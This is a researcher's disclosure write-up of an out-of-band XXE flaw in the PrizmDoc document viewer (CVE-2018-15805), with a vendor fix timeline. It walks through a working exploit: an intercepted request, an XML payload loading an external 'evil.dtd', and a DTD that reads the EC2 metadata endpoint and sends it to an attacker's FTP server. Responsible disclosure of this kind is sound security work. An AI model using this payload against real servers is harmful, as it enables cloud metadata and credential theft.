OOB XXE in PrizmDoc (CVE-2018–15805)


About PrizmDoc:

PrizmDoc is a web-based online document viewer and can be embedded into any web page or linked to from any website. The Viewing Client uses AJAX technology to communicate with the server to create a fast rendering of your content on the fly.

Vulnerability:

An XML External Entity attack is a type of attack against an application that parses XML input. This attack may lead to the disclosure of confidential data, denial of service, server side request forgery, port scanning from the perspective of the machine where the parser is located, and other system impacts.

Vulnerable System:

PrizmDoc < 13.5

I originally found this on several bug bounty programs (on older versions of prizmdoc), but later realized it’s 0-day after testing on latest version of prizmdoc

I didn’t have test server, so I performed the test for POC on their demo server located here:

https://www.accusoft.com/demos/file-type-demo/

Exploit:

  1. Browse to URL: https://www.accusoft.com/demos/file-type-demo/
  2. Scroll down to viewer.
  3. Click on download.
  4. Choose Download as PDF, tick corresponding to redactions.
  5. Click on download.
  6. Intercept the request using burp suite, the request will be such as:
POST /pcc/ViewingSession/ud6e8-z6riLGCd8LEK-08IonE_yHaGKTl3npOe2Z2dfJ_qnX5YVH2HT2BtFySMgBxT41T9CKW_YG_ilHEFwDhPra9NpkapKoxPWEk2FC 5Zk/MarkupBurner HTTP/1.1 
Host: pcc-demos.accusoft.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0 Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/xml
Accusoft-Gid: GYiW8kmOutLSMTRWwxC45w
Accusoft-Parent-Name: ViewerControl
Accusoft-Parent-Pid: 0
Accusoft-Parent-Taskid: 0
Referer: https://www.accusoft.com/demos/file-type-demo/
Content-Length: 413
Origin: https://www.accusoft.com
Connection: close
<documentAnnotations><pages><page id="1" pageWidth="1440" pageHeight="810"></page><page id="2" pageWidth="1440" pageHeight="810"></page><page id="3" pageWidth="1440" pageHeight="810"></page><page id="4" pageWidth="1440" pageHeight="810"></page></pages><highlights /></documentAnnotations>

7. Modify the above request to include the external DTD such as:

<?xml version=”1.0" encoding=”UTF-8"?><!DOCTYPE a [ <!ENTITY % asd SYSTEM
http://external.url/evil.dtd"> %asd; %c;]> <documentAnnotations>&rrr;<pages><page
id=”1" pageWidth=”1440" pageHeight=”810"></page><page id=”2" pageWidth=”1440"
pageHeight=”810"></page><page id=”3" pageWidth=”1440"
pageHeight=”810"></page><page id=”4" pageWidth=”1440"
pageHeight=”810"></page></pages><highlights /></documentAnnotations>

In above payload, we have defined external DTD with entity pointing to external url which contains a dtd file and then call the entity as &rrr; inside

<documentAnnotations>

The DTD file should be like:

Evil.dtd:


<!ENTITY % d SYSTEM “http://169.254.169.254/latest/meta-data/hostname">
<!ENTITY % c “<!ENTITY rrr SYSTEM ‘ftp://x.x.x.x:2121/%d;'>">

After setting up, please run the emulated ftp server on a port and make sure this port should be mentioned in evil.dtd for a back connection (p.s https://medium.com/@mrnikhilsri/soap-based-unauthenticated-out-of-band-xml-external-entity-oob-xxe-in-a-help-desk-software-c27a6abf182a for this setup)

<!ENTITY rrr SYSTEM ‘ftp://your-vps-ip:2121/%d;'>">

8. Now, Modify the http request as shown in step 6 with XXE payload as shown in step 7 and replay it as shown in screenshot:

Please notice the ftp server, you will receive a back connection with EC2 metadata as shown in screenshot:

Quick Video POC:

Timeline:

  • 23 august 2018 — Reported the issue to PrizmDoc
  • 23 august 2018 — Acknowledgement from PrizmDoc
  • 23 august 2018 — Request for CVE
  • 23 august 2018 — CVE-assigned
  • 29 august 2018 — Vendor Response on Fix scheduled to release in October
  • 8 November 2018 —Vulnerability Fixed
  • 13 November 2018 — Published

Discovered by:

Nikhil (@niksthehacker)